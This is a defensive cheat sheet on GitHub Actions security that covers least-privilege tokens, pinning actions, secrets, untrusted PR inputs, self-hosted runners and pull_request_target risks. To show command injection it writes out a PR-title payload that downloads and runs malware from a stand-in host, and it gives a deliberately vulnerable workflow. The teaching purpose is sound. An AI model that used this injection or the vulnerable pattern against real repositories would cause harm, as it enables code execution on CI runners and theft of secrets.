This article is the result of a collaboration with C.J. May.
“GitHub Actions keep me up at night. I worry that a malicious actor will use GitHub Actions to inject code into one of my repositories unbeknownst to me.”
GitHub Actions is an increasingly popular CI/CD platform. It lets you automate almost every task of the development cycle while remaining easy to use. However, because workflows often run external code, they require some security measures. We have gathered the main tips to secure your GitHub Actions in this cheat sheet:
What are GitHub Actions?
GitHub Actions is GitHub’s CI/CD service. It’s the mechanism used to run workflows from development to production systems. Actions are triggered by GitHub events (a pull request is submitted, an issue is opened, a PR is merged, etc.) and can execute pretty much any command. For instance, they can be used to format the code, format the PR, sync an issue’s comments with another ticketing system’s comments, add the appropriate labels to a new issue, or trigger a full-scale cloud deployment.
A workflow is made of one or more jobs, which are run inside their own virtual machine or container (a runner), that execute one or more steps. A step can be a shell script or an action, which is a reusable piece of code specially packaged for the GitHub CI ecosystem.
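To make the vocabulary concrete, here is a minimal sketch of a workflow with one job and two steps (one reusable action, one shell script); the names are illustrative:

```yaml
# Sketch: one workflow -> one job (runs in its own runner) -> several steps
name: example
on: push

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3   # a step that is a packaged action
      - run: echo "hello"           # a step that is a shell script
```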
Because GitHub is hosting millions of open-source projects that can be forked and contributed to through pull requests, GitHub Actions security is paramount to prevent supply-chain attacks.
This cheat sheet is here to help you mind the risks posed by some GitHub Action workflows, no matter if you are maintaining open-source projects or not.
Let’s dive into the best practices:
Set minimum scope for credentials
This is a general security principle for all the credentials used by your workflow, but let’s focus on a GitHub-specific one: the GITHUB_TOKEN.
This token grants each runner privileges to interact with the repository. It is temporary, meaning its validity starts and ends with the workflow.
By default, the token’s permissions are either “permissive” (read/write for most of the scopes) or “restricted” (no permission by default in most scopes). In either case, forked repos only have, at most, read access. Whichever option you choose, the GITHUB_TOKEN should always be granted the minimum permissions required to execute a workflow/job.
You should make use of the ‘permissions’ key in your workflows to configure the minimum required permissions for a workflow or job. This allows fine-grained control over the privileges of your GitHub Actions. The set of permissions required to call each endpoint of the GitHub API is extensively documented, so check what the default permissions are and adjust them to match what your workflow actually needs.
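As a sketch, a job that only needs to read the repository and label issues could declare something like this (the exact scopes depend on what your job does):

```yaml
# Sketch: restrict the GITHUB_TOKEN to exactly what this job needs
permissions:
  contents: read   # check out the code
  issues: write    # e.g. add labels to new issues
```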
💡 This principle applies to environment variables as well. To limit their scope, you should always declare environment variables at the step level, so they won’t be accessible to other steps. In contrast, defining them at the job level makes them available to all steps, including potentially compromised code (more on that later).
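For instance (the secret name and script are hypothetical), a variable declared on a single step stays invisible to the rest of the job:

```yaml
# Sketch: the variable is scoped to the step that needs it, not the whole job
steps:
  - name: Notify
    env:
      WEBHOOK_URL: ${{ secrets.WEBHOOK_URL }}   # visible to this step only
    run: ./notify.sh
  - name: Build
    run: make build   # WEBHOOK_URL is not defined here
```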
Use specific action version tags
Typically, when people make their own workflows on GitHub, they use Actions made by someone else. Almost all workflows begin with a step like the one below:
- name: Check out repository
  uses: actions/checkout@v3
Most people probably think:
“Well yeah, that just fetches my code. What could possibly be dangerous about that?”
The important part to consider is how it checks out your code. That line that starts with “uses” means that there’s some work going on behind the scenes to get the code from your GitHub repo to the server that is running your workflow. For the “actions/checkout” action, that behind-the-scenes stuff lives in its own repo. If you read the source code, there’s actually a lot going on that you wouldn’t have known about if you didn’t take a look! More than that though, you don’t maintain the code that is running in that Action.
When you think about it, there is some risk in blindly trusting all these actions. Third-party actions are interacting with your code and possibly running on a server you own, but do you ever look at what they are actually doing under the hood? Are you monitoring changes that are made to the action when the author publishes an update? For just about everyone, the answer to both of those questions is probably no.
💡 Consider this threat scenario: you are using a third-party action that runs a linter on your code to check for formatting issues. Rather than install, configure, and run a linter yourself, you decide to use an action from the GitHub Actions Marketplace that does what you need. You give it a test run, and it works! Since it does what you want, you set up a workflow in your repo that uses it:
- name: Lint code
  uses: someperson/lint-action@v1
After months of using this action, you suddenly start having issues with your API keys being stolen and abused. After some investigating, you find out that the author of the third-party linter action recently pushed an update to the GitHub Marketplace. You go to the action’s source repo and see that code was recently added to send environment variables to some random web address.
In that hypothetical scenario, the author of the third-party action (or someone who hijacked their account) added malicious code to the action and re-tagged it as “v1”. Everyone using someperson/lint-action@v1 was now running the malicious code in their workflows. Now that we see the threat from this scenario, how do we protect ourselves from it?
No one has the time to watch for updates on every third-party action they use, but luckily GitHub gives us a way to prevent updates from altering the actions we use. Rather than running an action with a tag from the repo, you can use a commit hash. For example, when I automatically push container images to Docker Hub, I use the following step in my workflows to authenticate:
- name: Log in to the container registry
  uses: docker/login-action@f054a8b539a109f9f41c372932f1ae047eff08c9
By specifying exactly what commit I want to use when I authenticate to Docker Hub, I never have to worry about the action changing or behaving differently. You can do the same thing with any action that you use in your workflows.
Don’t use plain-text secrets
This one is a little more obvious, but it still needs to be said. Source code isn’t the only place where it’s a bad idea to store API keys and passwords in plain text; in fact, there is no place where it’s okay to do that, and CI workflow files are no exception. GitHub Secrets is a feature that lets you store your keys safely and reference them in your workflows with ${{ }} brackets. Make sure to keep all plain-text secrets out of your GitHub Actions.
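For example (the secret name is hypothetical), a publish step would reference the stored secret rather than pasting the token into the workflow file:

```yaml
# Sketch: the token lives in GitHub Secrets, never in the workflow file itself
- name: Publish package
  env:
    NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
  run: npm publish
```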
Of course, you should also leverage your workflow to scan for secrets in the source code itself: here is the ggshield-action you can use for free.
Don’t reference values that you don’t control
GitHub allows you to use ${{ }} brackets to reference secrets and other values from your GitHub environment. Unfortunately, some of the values that you can reference may not be set by you. This is an extremely common mistake found in a number of open-source repositories!
Let’s take a look at this workflow I found and fixed on an open-source repository:
- name: lint
  run: |
    echo "${{ github.event.pull_request.title }}" | commitlint
If you look at the “lint” step of the workflow, you can see that the run command includes some input from the pull request. In particular, it’s grabbing the title of the pull request, which is set by the person who submitted it. Let’s say someone submitted a pull request to this repository with a name like:
a" && wget https://example.com/malware && ./malware && echo "Title
In that scenario, the workflow YAML would be evaluated like the following:
- name: lint
  run: |
    echo "a" && wget https://example.com/malware && ./malware && echo "Title" | commitlint
In this example, the threat actor downloaded malware and executed it, but they could have done other things, like steal the runner’s GITHUB_TOKEN. Depending on the workflow’s running context, the token could have write permission to the original repo, meaning the repository content, including releases, could be modified! Another example is exfiltrating sensitive data from the CI, harvesting secrets that could be used to move laterally.
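The key point is that ${{ }} expansion is a plain textual substitution, performed before the shell ever parses the command line. This small, purely illustrative sketch simulates that expansion:

```python
# Hypothetical illustration of how ${{ }} expansion turns attacker-controlled
# text into shell syntax. This simulates the substitution GitHub performs
# before the runner's shell parses the command.
template = 'echo "${{ github.event.pull_request.title }}" | commitlint'

# The PR title, chosen by the attacker:
title = 'a" && wget https://example.com/malware && ./malware && echo "Title'

# Textual substitution: the quotes in the title now terminate the echo string
expanded = template.replace("${{ github.event.pull_request.title }}", title)
print(expanded)
# prints: echo "a" && wget https://example.com/malware && ./malware && echo "Title" | commitlint
```

Because the substitution happens before parsing, no amount of quoting inside the `run:` script can make a directly referenced value safe.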
Pull request title isn’t the only GitHub environment value that is set by external parties. Pull request body, as well as Issue title and body, are also examples of untrusted values. When you are referencing variables like that in steps of your GitHub Actions, it’s important to make sure you control where they come from.
To stay on the safe side, you have two options:
Use an action instead of an inline script
An action will receive the (untrusted) context value as an argument, neutralizing injection attacks:
- uses: fakeaction/checktitle@v3
  with:
    title: ${{ github.event.pull_request.title }}
Use an intermediate environment variable
If you somehow need to execute a script, you should set up an intermediate environment variable:
- name: Check PR title
  env:
    PR_TITLE: ${{ github.event.pull_request.title }}
  run: |
    echo "$PR_TITLE"
Notice that we take extra precautions by double-quoting the variable to avoid other types of exploitation.
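The difference with the injection above is that the title now reaches the shell as the *value* of a variable, not as part of the command text. A quick demo in plain shell (outside Actions, with a stand-in payload) shows the malicious title being printed literally instead of executed:

```shell
# Demo: once the attacker-controlled title sits in an environment variable,
# the double-quoted expansion treats it as data, not as shell syntax.
PR_TITLE='a" && echo INJECTED && echo "Title'

# Prints the title verbatim; the && operators are never interpreted
printf '%s\n' "$PR_TITLE"
# prints: a" && echo INJECTED && echo "Title
```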
Only run workflows on trusted code
This next section is especially important if you host your own action runners, but it applies to GitHub’s runners too. You need to be vigilant when it comes to when workflows run. By running a workflow, you are giving it permission to potentially run code, access secrets, and execute in the runner environment.
Controlling when workflows run is critical to the security of your GitHub actions. The questions you should be asking yourself are, “What code is running when I kick off my workflow?” and, “Where did that code come from?” If you maintain an open-source repository, you may get periodic pull requests from people you have never interacted with before. Let’s think about a potential threat scenario.
💡 Let’s say you are a maintainer of an organization on GitHub, and you have a popular open-source project that has automated testing set up. Someone submits a pull request to this repo with a new feature and some test cases for it. However, one of the test cases doesn’t test the code, it installs a bitcoin miner on the runner server. As soon as your CI kicks off all of the test code, your runner is compromised.
In practice, GitHub actually has good default settings to protect us from something like this. First, GitHub doesn’t allow individual accounts to use self-hosted runners on public repositories, but they do allow organizations to do so. If you do maintain an organization, this is a danger you need to be very aware of (more in the next section).
Another protection you have against this type of scenario is a setting that lets you determine when GitHub Actions are run on code from pull requests. By default, pull requests from first-time contributors require approval from a maintainer to start CI tests. As a maintainer, it is your responsibility to make sure that you have read all the code being submitted before approving the workflows. Another potential risk is someone submitting a small, legitimate pull request before submitting a second one with malicious code. The second PR would automatically run all configured workflows because that person is no longer a first-time contributor. It’s not the default, but GitHub does have an option to require approval for all outside collaborators. It’s much safer to use this setting than the default.
Harden your Action runners (and don’t use self-hosted runners for public repositories!)
During the setup of your CI workflows, you specify in each workflow where it’s supposed to run. GitHub offers some different runners you can use, such as Ubuntu, Mac, and Windows. When you use GitHub’s runners, they start off as a clean VM each time. However, you also have the option to configure your own servers as runners to execute your workflows.
TL;DR: don’t use self-hosted runners for a public repository. You would basically be allowing anybody who forks your repo to submit a malicious pull request that tries to escape its sandbox, access the network, and so on, and you are in charge of securing all of that! So just play it safe and avoid self-hosted runners for public repos whenever possible.
Now, for those of you who absolutely need to set up a self-hosted runner (for your private repositories please!), you still need to be extra careful:
- You should be the only one configuring the workflows that run on that server.
- Use a dedicated unprivileged account (ex: “github-runner”) to launch the runner and execute the workflows. This user shouldn’t have admin permissions! You should make sure it doesn’t have permission to modify anything outside of its own workspace, and if you absolutely need “sudo” permission in your workflow, you should only allow it for the specific executable it needs.
- It is a security best practice to execute each job in an ephemeral and isolated workload (such as a Kubernetes Pod or a container). This way, the environment is destroyed when the workflow is done, and you avoid many potential risks.
- Use logging and security monitoring tools. If you have a security team with their own tools, make sure they have visibility into your runner servers. Collecting process logs with an EDR agent or something like Sysmon for Linux is the first step, but ideally, you should also have detection rules that will alert you if something suspicious is going on.
💡 In the SolarWinds supply chain attack, the key point of the compromise was when the threat actor was inside SolarWinds’ build servers. The threat actor used that access to inject malicious code into the Orion platform. Tampering with the build process was the impact of the breach, but there were certainly other detection opportunities from the command-and-control (C2) and persistence techniques that the attacker used. Monitoring for suspicious activity on your runners will help you ensure the integrity of your code.
Be extra careful with the pull_request_target trigger
There is another vulnerability, called pwn requests, to consider when maintaining an open-source repository. It is quite subtle, so I will go through it step by step to explain how a malicious pull request could, under specific circumstances, exfiltrate your secrets or even tamper with the releases!
TL;DR: if you're using the ‘on: pull_request_target’ event in GitHub Actions, never check out the pull request's code. DON’T use the following:

on: pull_request_target
…
steps:
  - uses: actions/checkout@v3
    with:
      ref: ${{ github.event.pull_request.head.sha }}
Explainer: when someone forks your repo and opens a pull request, there are two repos involved: the repo under your control (the target repo), and the other person's fork repo.
Usually, we use the ‘pull_request’ trigger event to trigger a workflow when someone submits a PR. With it, the triggered workflow runs in the context of the submitter's fork repo. Therefore, the provided GITHUB_TOKEN will not have write access, and the secrets are not accessible either.
While these are sane defaults, in some cases they can be a bit too constrained. At the open-source community’s request, GitHub introduced the ‘pull_request_target’ event. The difference between the two is subtle but has a lot of security implications.
The ‘pull_request_target’ trigger runs in the context of your target repo, meaning the workflow has access to YOUR secrets and write access to YOUR code. This gets dangerous when the workflow is running code you don't control: this is why checking out the fork repo's code is basically opening the workflow to any kind of remote code execution!
Example of a vulnerability
To demonstrate this, let’s inspect a vulnerable GitHub Action:
name: my action
on: pull_request_target

jobs:
  pr-check:
    name: Check PR
    runs-on: ubuntu-latest
    steps:
      - name: Setup Action
        uses: actions/checkout@v3
        with:
          ref: ${{ github.event.pull_request.head.ref }}
          repository: ${{ github.event.pull_request.head.repo.full_name }}
      - name: Setup Python 3.10
        uses: actions/setup-python@v3
        with:
          python-version: "3.10"   # quoted, otherwise YAML reads 3.10 as the number 3.1
      - name: Install dependencies
        run: pip install -r requirements.txt
      - name: some command
        run: some_command
        env:
          SOME_SECRET: ${{ secrets.SOME_SECRET }}
We have our two conditions met: the workflow is triggered to run on the target repo, and the job’s first step checks out the HEAD (last commit) of the pull request’s code. So the code used in the rest of the workflow comes from the pull request, which opens many exploitation vectors.
For instance, the seemingly innocuous ‘run: pip install …’ executed to install the dependencies is now a potential vector. How? By modifying setup.py to execute a “pre-install” script before pip launches. Since shell commands are available from that script, an attacker could easily launch a reverse shell, or fetch a malicious payload designed to do basically whatever they want with the original repository source code, including modifying and re-tagging a release!
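To see why pip is such a convenient vector, remember that setup.py is ordinary Python: any top-level statement runs the moment pip evaluates the file. This purely illustrative sketch simulates that evaluation in-process (the “payload” just sets an environment variable as a stand-in):

```python
# Sketch of the attack surface: setup.py is plain Python, so any top-level
# statement executes as soon as `pip install` evaluates the file.
import os

MALICIOUS_SETUP_PY = '''
import os
# Stand-in for a real payload (reverse shell, secret exfiltration, ...)
os.environ["PWNED"] = "1"
'''

# pip effectively executes setup.py; exec() stands in for that step here
exec(compile(MALICIOUS_SETUP_PY, "setup.py", "exec"))

print(os.environ.get("PWNED"))  # prints: 1
```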
This is a perfect example of a vulnerability that can be leveraged to execute a supply-chain attack: all the users of an open-source project would be affected without knowing.
Remember, this is just one vector though! An even easier route would be to exfiltrate the SOME_SECRET environment variable by changing the some_command binary.
Small remark: this works because the vulnerable step is executed after the malicious step; otherwise, the secret would not have been accessible, since in any workflow, environment variables are only valid during the step where they are defined (step-scoped), except for job-level environment variables (see rule n°1).
It is also worth noting that shell commands are not the only thing vulnerable in this configuration: even if the workflow relied only on actions, odds are high that code injection would still be possible, since a lot of actions execute local scripts behind the scenes. Final note: we only described the most obvious compromise vectors here, but there are countless ways the PR’s source code could tamper with the workflow execution.
You now see why using pull_request_target is highly discouraged, and if you do use it, never blindly check out untrusted PR code!
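For completeness, a pull_request_target workflow can be safe when it never touches the PR’s code and only uses the GitHub API. One plausible sketch (the labeler action is a real one, but check its current inputs before relying on this):

```yaml
# Sketch: a pull_request_target workflow that never checks out untrusted code
name: label-prs
on: pull_request_target

permissions:
  contents: read        # read the labeler configuration from the target repo
  pull-requests: write  # apply labels via the API

jobs:
  label:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/labeler@v4   # operates through the API, no PR checkout
```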
Prefer OpenID Connect to access cloud resources
OpenID Connect (OIDC) is a technology allowing you to connect your workflows to cloud resources without needing to copy a long-lived secret into GitHub. Instead, when set up, your workflow requests and uses short-lived access tokens from the cloud provider.
This requires a bit of upfront work to set up, but you will benefit in the long run: no more long-lived credentials living in GitHub, fine-grained access controls from your cloud provider, and better-automated secrets management.
For that, you first need to bootstrap a trust relationship (OIDC Trust) on the cloud provider side, controlling who can access what. Then, on the GitHub side, an OIDC provider will be configured to auto-generate a JWT token containing claims that allow the workflow to authenticate to the cloud provider. Once these claims are validated, a role-scoped, short-lived access token is sent back to the workflow to execute. Learn how to configure OpenID Connect with GitHub here.
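As an illustration (the role ARN and region are placeholders), an AWS deployment job using OIDC could look roughly like this; the `id-token: write` permission is what lets the job request the JWT from GitHub’s OIDC provider:

```yaml
# Sketch: short-lived AWS credentials via OIDC, no long-lived secret in GitHub
permissions:
  id-token: write   # required to request the OIDC JWT
  contents: read

jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: aws-actions/configure-aws-credentials@v2
        with:
          role-to-assume: arn:aws:iam::123456789012:role/my-github-actions-role
          aws-region: us-east-1
```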
Conclusion
GitHub Actions is among the favorite CI/CD tools of the open-source community. With popularity comes more security scrutiny. Whether you use actions on public or private repositories, you should be careful about how you set up your workflows. Failing to do so could make your secrets and artifacts vulnerable, lead to a compromise of your build servers, or even allow someone to carry out a supply chain attack.
We have presented you with the GitHub Actions security best practices.
Here is a brief summary:
- Use minimally scoped credentials, in particular, make sure the GITHUB_TOKEN is configured with the least privileges to run your jobs.
- Use specific version tags to shield yourself from supply-chain compromise of third-party actions.
- Never store any API key, token, or password in plaintext (use GitHub Secrets). Use the ggshield-action to implement secrets detection with remediation in your CI workflows.
- Don’t directly reference values that you don’t control: it’s all too easy for a malicious PR to inject code. Instead, use an action with arguments, or bind the value to an environment variable.
- Be extra-careful when using self-hosted runners: preferably don’t use this option for open source repositories, or require approval for all external submissions to run workflows. It’s your responsibility to harden the virtual machines used by the runners, so configure them to use a low-privileged user, be as ephemeral as possible, and instrument the adequate logging and monitoring tools.
- Don’t check out external PRs when using the ‘pull_request_target’ event: a malicious PR could abuse any of your build steps/secrets to compromise your environment.
- Prefer using OpenID Connect instead of long-lived secrets to allow your workflows to interact with cloud resources.
This can be hard to remember, that’s why we packaged all of this in a cheat sheet. Feel free to share it around you!